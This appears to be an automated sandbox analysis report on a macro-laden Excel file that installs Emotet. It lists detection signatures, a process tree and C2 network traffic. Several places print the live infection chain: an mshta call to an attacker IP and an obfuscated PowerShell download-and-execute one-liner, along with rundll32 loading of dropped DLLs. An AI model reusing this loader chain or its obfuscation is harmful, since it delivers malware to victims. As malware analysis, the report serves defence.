Windows Analysis Report
NZW-010122 BNUV-280122.xlsm

Overview

General Information

Sample Name: NZW-010122 BNUV-280122.xlsm
Analysis ID: 562386
MD5: acbaebd7bb2090b795b481d48453b3fa
SHA1: a06b2a6d2a15d070262144854ea4ace65cb71892
SHA256: c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 380 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1960 cmdline: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2756 cmdline: mshta http://91.240.118.172/cc/vv/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2428 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2420 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 284 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 408 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 560 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source | Rule | Description | Author | Strings
NZW-010122 BNUV-280122.xlsm | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15310:$s1: Excel
  • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
NZW-010122 BNUV-280122.xlsm | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15310:$s1: Excel
  • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\ProgramData\JooSee.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
16.2.rundll32.exe.2d30000.19.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
16.2.rundll32.exe.2c30000.15.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
16.2.rundll32.exe.2d60000.20.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.rundll32.exe.210000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.rundll32.exe.9b0000.8.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

                            System Summary

                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2756, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1960, ProcessCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 2756
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 380, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 1960
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016

                            AV Detection

                            Source: 16.2.rundll32.exe.320000.3.unpack, Malware Configuration Extractor: Emotet
                            Source: C:\ProgramData\JooSee.dll, Joe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10021854 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_10021854 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 16_2_002B7E00 FindFirstFileW

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global traffic, DNS query: name: weezual.fr

                            Networking

                            Source: Traffic, Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 160.16.102.168 80
                            Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1
                                Host: 91.240.118.172
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1
                                Host: weezual.fr
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1
                                Host: mycloud.suplitecmo.com
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
                                Connection: Keep-Alive
                                Keep-Alive: timeout=5, max=100
                                x-powered-by: PHP/7.4.27
                                set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/
                                cache-control: no-cache, must-revalidate
                                pragma: no-cache
                                last-modified: Fri, 28 Jan 2022 19:39:50 GMT
                                expires: Fri, 28 Jan 2022 19:39:50 GMT
                                content-type: application/x-msdownload
                                content-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"
                                content-transfer-encoding: binary
                                content-length: 548864
                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                server: LiteSpeed
                                Data Ascii: MZ@!L!This program c
                            Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1
                                Accept: */*
                                Accept-Language: en-US
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 91.240.118.172
                                Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
                            Source: unknown Network traffic detected: IP country count 21
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: weezual.fr
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
                                date: Fri, 28 Jan 2022 19:39:50 GMT
                                content-type: text/html; charset=iso-8859-1
                                content-length: 261
                                server: Apache
                                x-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4
                                x-iplb-instance: 31947
